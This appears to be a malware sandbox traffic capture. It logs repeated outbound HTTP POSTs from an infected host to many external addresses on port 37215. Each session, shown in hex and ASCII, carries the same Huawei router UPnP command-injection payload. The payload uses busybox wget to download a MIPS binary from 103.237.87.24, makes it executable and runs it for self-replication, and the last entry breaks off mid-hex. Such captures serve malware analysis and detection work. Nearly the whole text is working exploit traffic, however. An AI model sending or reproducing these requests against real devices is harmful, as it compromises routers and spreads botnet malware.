                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2413192.168.2.1357762188.164.180.18537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.625650883 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2414192.168.2.1342478157.182.129.25237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.625653982 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2415192.168.2.1333850157.188.11.20537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.625669956 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2416192.168.2.133772681.19.167.19337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.625677109 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2417192.168.2.133295641.87.48.20237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.625680923 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2418192.168.2.1357968157.201.97.8137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.625680923 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2419192.168.2.1335512157.238.2.6937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.625699997 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2420192.168.2.1358198197.74.173.20137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.625705957 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2421192.168.2.134818641.214.220.18537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.625705957 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2422192.168.2.1352656197.44.106.15937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:08.625715971 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 